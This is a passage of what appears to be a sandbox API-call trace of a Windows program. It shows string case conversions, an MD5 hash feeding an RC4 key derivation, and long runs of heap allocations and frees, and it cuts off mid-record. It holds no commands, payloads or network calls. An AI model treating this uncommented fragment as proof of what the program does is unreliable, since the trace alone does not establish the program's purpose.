PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.883] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0165.883] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.883] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.884] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.884] CryptCreateHash (in: hProv=0xab2890, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0165.884] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.884] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.884] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.884] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.884] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0165.884] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.884] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.884] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.884] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.884] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.884] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.884] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.884] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.885] CryptHashData (hHash=0xaa5660, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0165.885] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.885] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.885] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.885] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.885] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.885] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.885] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.885] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.885] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0165.885] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.885] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0165.885] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.885] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.885] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.885] CryptDeriveKey (in: hProv=0xab2890, Algid=0x6601, hBaseData=0xaa5660, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa55e0) returned 1 [0165.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0165.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0165.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0165.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0165.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0165.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0165.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0165.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0165.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0165.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0165.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0165.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0165.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0165.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0165.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0165.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0165.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0165.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0165.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0165.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0165.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0165.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0165.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0165.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0165.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0165.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0165.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0165.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0165.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0165.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0165.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0165.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0165.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0165.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0165.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0165.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0165.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0165.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0165.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0165.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0165.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0165.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0165.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0165.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0165.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0165.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0165.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0165.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0165.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0165.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0165.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0165.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0165.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0165.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0165.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0165.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0165.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0165.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0165.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0165.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0165.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0165.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0165.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0165.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0165.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0165.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0165.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0165.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0165.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0165.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0165.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0165.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0165.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0165.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0165.890] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0165.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0165.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0165.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0165.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0165.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0165.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0165.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0165.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0165.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0165.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0165.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0165.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0165.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0165.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0165.891] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0165.891] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0165.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0165.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0165.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0165.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0165.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0165.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0165.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0165.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0165.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0165.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0165.892] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0165.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0165.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0165.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0165.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0165.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0165.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0165.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0165.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0165.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0165.892] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0165.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0165.892] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0165.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0165.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0165.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0165.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0165.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0165.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0165.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0165.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0165.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0165.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0165.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0165.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6a0 [0165.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2e0 [0165.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0165.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0165.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0165.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0165.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0165.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa370 [0165.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2f8 [0165.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa388 [0165.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0165.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5c8 [0165.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0165.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5f8 [0165.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0165.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa538 [0165.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa448 [0165.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0165.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6b8 [0165.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5e0 [0165.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0165.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2b0 [0165.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa610 [0165.894] RtlAllocateHeap 